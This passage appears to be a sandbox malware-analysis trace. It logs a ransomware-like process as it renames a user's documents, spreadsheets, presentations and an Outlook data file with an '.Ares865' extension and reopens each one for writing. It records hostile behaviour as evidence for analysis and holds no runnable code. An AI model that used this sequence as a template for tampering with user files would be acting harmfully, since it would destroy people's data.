(lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\Fo93gd6JcbbXy S1 9Y.ppt.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\fo93gd6jcbbxy s1 9y.ppt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.069] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=37053) returned 1 [0094.074] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\gM d1iXlmcFz.docx.Ares865") returned 68 [0094.074] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\gM d1iXlmcFz.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\gm d1ixlmcfz.docx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\gM d1iXlmcFz.docx.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\gm d1ixlmcfz.docx.ares865"), dwFlags=0x1) returned 1 [0094.075] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\gM d1iXlmcFz.docx.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\gm d1ixlmcfz.docx.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.075] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=11099) returned 1 [0094.078] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\M0NM3.xlsx.Ares865") returned 61 [0094.078] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\M0NM3.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\m0nm3.xlsx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\M0NM3.xlsx.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\m0nm3.xlsx.ares865"), dwFlags=0x1) returned 1 [0094.078] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\M0NM3.xlsx.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\m0nm3.xlsx.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.079] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=102176) returned 1 [0094.085] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\oHiUSyU-2T4IUJrS.pptx.Ares865") returned 72 [0094.085] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\oHiUSyU-2T4IUJrS.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\ohiusyu-2t4iujrs.pptx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\oHiUSyU-2T4IUJrS.pptx.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\ohiusyu-2t4iujrs.pptx.ares865"), dwFlags=0x1) returned 1 [0094.086] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\oHiUSyU-2T4IUJrS.pptx.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\ohiusyu-2t4iujrs.pptx.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.086] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2147) returned 1 [0094.088] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\qaBK.rtf.Ares865") returned 59 [0094.088] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\qaBK.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\qabk.rtf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\qaBK.rtf.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\qabk.rtf.ares865"), dwFlags=0x1) returned 1 [0094.088] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\qaBK.rtf.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\qabk.rtf.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.089] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=80030) returned 1 [0094.093] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\R40wwifVtzvONs.pptx.Ares865") returned 70 [0094.094] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\R40wwifVtzvONs.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\r40wwifvtzvons.pptx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\R40wwifVtzvONs.pptx.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\r40wwifvtzvons.pptx.ares865"), dwFlags=0x1) returned 1 [0094.094] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\R40wwifVtzvONs.pptx.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\r40wwifvtzvons.pptx.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.095] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=22096) returned 1 [0094.097] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\rfnt.odp.Ares865") returned 59 [0094.097] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\rfnt.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\rfnt.odp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\rfnt.odp.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\rfnt.odp.ares865"), dwFlags=0x1) returned 1 [0094.098] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\rfnt.odp.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\rfnt.odp.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.099] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=98671) returned 1 [0094.104] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\Rr5oj-4E-.docx.Ares865") returned 65 [0094.104] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\Rr5oj-4E-.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\rr5oj-4e-.docx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\Rr5oj-4E-.docx.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\rr5oj-4e-.docx.ares865"), dwFlags=0x1) returned 1 [0094.105] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\Rr5oj-4E-.docx.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\rr5oj-4e-.docx.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.106] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=40802) returned 1 [0094.110] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\S7p6.xlsx.Ares865") returned 60 [0094.110] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\S7p6.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\s7p6.xlsx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\S7p6.xlsx.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\s7p6.xlsx.ares865"), dwFlags=0x1) returned 1 [0094.111] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\S7p6.xlsx.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\s7p6.xlsx.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.111] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=19769) returned 1 [0094.114] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\vn_ihpMYhbpaS.docx.Ares865") returned 69 [0094.114] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\vn_ihpMYhbpaS.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\vn_ihpmyhbpas.docx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\vn_ihpMYhbpaS.docx.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\vn_ihpmyhbpas.docx.ares865"), dwFlags=0x1) returned 1 [0094.115] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\vn_ihpMYhbpaS.docx.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\vn_ihpmyhbpas.docx.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.115] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=89473) returned 1 [0094.121] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\w-YiqrDrq.pptx.Ares865") returned 65 [0094.121] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\w-YiqrDrq.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\w-yiqrdrq.pptx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\w-YiqrDrq.pptx.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\w-yiqrdrq.pptx.ares865"), dwFlags=0x1) returned 1 [0094.121] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\w-YiqrDrq.pptx.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\w-yiqrdrq.pptx.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.122] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=73725) returned 1 [0094.126] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\UrVEZB", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\UrVEZB") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\UrVEZB" [0094.127] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\UrVEZB\\gD95_POK9B3tJgm.csv.Ares865") returned 77 [0094.127] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\UrVEZB\\gD95_POK9B3tJgm.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\urvezb\\gd95_pok9b3tjgm.csv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\UrVEZB\\gD95_POK9B3tJgm.csv.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\urvezb\\gd95_pok9b3tjgm.csv.ares865"), dwFlags=0x1) returned 1 [0094.128] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\UrVEZB\\gD95_POK9B3tJgm.csv.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\urvezb\\gd95_pok9b3tjgm.csv.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.128] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=96834) returned 1 [0094.133] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\UrVEZB\\IzTDkQ_vniMDC8Il.odp.Ares865") returned 78 [0094.133] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\UrVEZB\\IzTDkQ_vniMDC8Il.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\urvezb\\iztdkq_vnimdc8il.odp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\UrVEZB\\IzTDkQ_vniMDC8Il.odp.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\urvezb\\iztdkq_vnimdc8il.odp.ares865"), dwFlags=0x1) returned 1 [0094.134] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\UrVEZB\\IzTDkQ_vniMDC8Il.odp.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\urvezb\\iztdkq_vnimdc8il.odp.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.134] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=93033) returned 1 [0094.139] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\Outlook Files", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\Outlook Files") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\Outlook Files" [0094.140] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst.Ares865") returned 87 [0094.140] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\outlook files\\voeimd@djhreuu.uhd.pst"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\outlook files\\voeimd@djhreuu.uhd.pst.ares865"), dwFlags=0x1) returned 1 [0094.143] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\outlook files\\voeimd@djhreuu.uhd.pst.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.144] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=271360) returned 1 [0094.159] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\Njys", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\Njys") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\Njys" [0094.159] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\Njys\\0jIgSp-.ots.Ares865") returned 67 [0094.159] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\Njys\\0jIgSp-.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\njys\\0jigsp-.ots"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\Njys\\0jIgSp-.ots.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\njys\\0jigsp-.ots.ares865"), dwFlags=0x1) returned 1 [0094.160] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\Njys\\0jIgSp-.ots.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\njys\\0jigsp-.ots.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.160] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=42660) returned 1 [0094.163] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\Njys\\h7uHzWw.odp.Ares865") returned 67 [0094.163] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\Njys\\h7uHzWw.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\njys\\h7uhzww.odp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\Njys\\h7uHzWw.odp.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\njys\\h7uhzww.odp.ares865"), dwFlags=0x1) returned 1 [0094.164] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\Njys\\h7uHzWw.odp.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\njys\\h7uhzww.odp.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.164] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=11814) returned 1 [0094.167] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\Njys\\PXzjPVpVvbAMw.pps.Ares865") returned 73 [0094.167] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\Njys\\PXzjPVpVvbAMw.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\njys\\pxzjpvpvvbamw.pps"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\Njys\\PXzjPVpVvbAMw.pps.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\njys\\pxzjpvpvvbamw.pps.ares865"), dwFlags=0x1) returned 1 [0094.167] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\Njys\\PXzjPVpVvbAMw.pps.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\njys\\pxzjpvpvvbamw.pps.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.168] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=42117) returned 1 [0094.171] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\n6tOtL", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\n6tOtL") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\n6tOtL" [0094.172] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\n6tOtL\\36TS.csv.Ares865") returned 66 [0094.172] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\n6tOtL\\36TS.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\n6totl\\36ts.csv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\n6tOtL\\36TS.csv.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\n6totl\\36ts.csv.ares865"), dwFlags=0x1) returned 1 [0094.175] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\n6tOtL\\36TS.csv.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\n6totl\\36ts.csv.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.175] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=78759) returned 1 [0094.180] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\n6tOtL\\76ZJectu1ufQ.rtf.Ares865") returned 74 [0094.180] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\n6tOtL\\76ZJectu1ufQ.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\n6totl\\76zjectu1ufq.rtf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\n6tOtL\\76ZJectu1ufQ.rtf.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\n6totl\\76zjectu1ufq.rtf.ares865"), dwFlags=0x1) returned 1 [0094.181] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\n6tOtL\\76ZJectu1ufQ.rtf.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\n6totl\\76zjectu1ufq.rtf.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.181] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=45566) returned 1 [0094.184] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\n6tOtL\\QBcZn_ZLV8PkU4wab40c.ots.Ares865") returned 82 [0094.185] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\n6tOtL\\QBcZn_ZLV8PkU4wab40c.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\n6totl\\qbczn_zlv8pku4wab40c.ots"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\n6tOtL\\QBcZn_ZLV8PkU4wab40c.ots.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\n6totl\\qbczn_zlv8pku4wab40c.ots.ares865"), dwFlags=0x1) returned 1 [0094.185] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\n6tOtL\\QBcZn_ZLV8PkU4wab40c.ots.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\n6totl\\qbczn_zlv8pku4wab40c.ots.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.185] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=101006) returned 1 [0094.191] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\n6tOtL\\mfYE2jthnbv WVhiisR", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\n6tOtL\\mfYE2jthnbv WVhiisR") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\n6tOtL\\mfYE2jthnbv WVhiisR" [0094.191] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\n6tOtL\\mfYE2jthnbv WVhiisR\\R8OoLH7Lxp-IYl.docx.Ares865") returned 97 [0094.191] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\n6tOtL\\mfYE2jthnbv WVhiisR\\R8OoLH7Lxp-IYl.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\n6totl\\mfye2jthnbv wvhiisr\\r8oolh7lxp-iyl.docx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\n6tOtL\\mfYE2jthnbv WVhiisR\\R8OoLH7Lxp-IYl.docx.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\n6totl\\mfye2jthnbv wvhiisr\\r8oolh7lxp-iyl.docx.ares865"), dwFlags=0x1) returned 1 [0094.192] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\n6tOtL\\mfYE2jthnbv WVhiisR\\R8OoLH7Lxp-IYl.docx.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\n6totl\\mfye2jthnbv wvhiisr\\r8oolh7lxp-iyl.docx.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.192] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=71286) returned 1 [0094.197] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\n6tOtL\\mfYE2jthnbv WVhiisR\\V5cL YSs1MpdhLl.csv.Ares865") returned 97 [0094.197] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\n6tOtL\\mfYE2jthnbv WVhiisR\\V5cL YSs1MpdhLl.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my 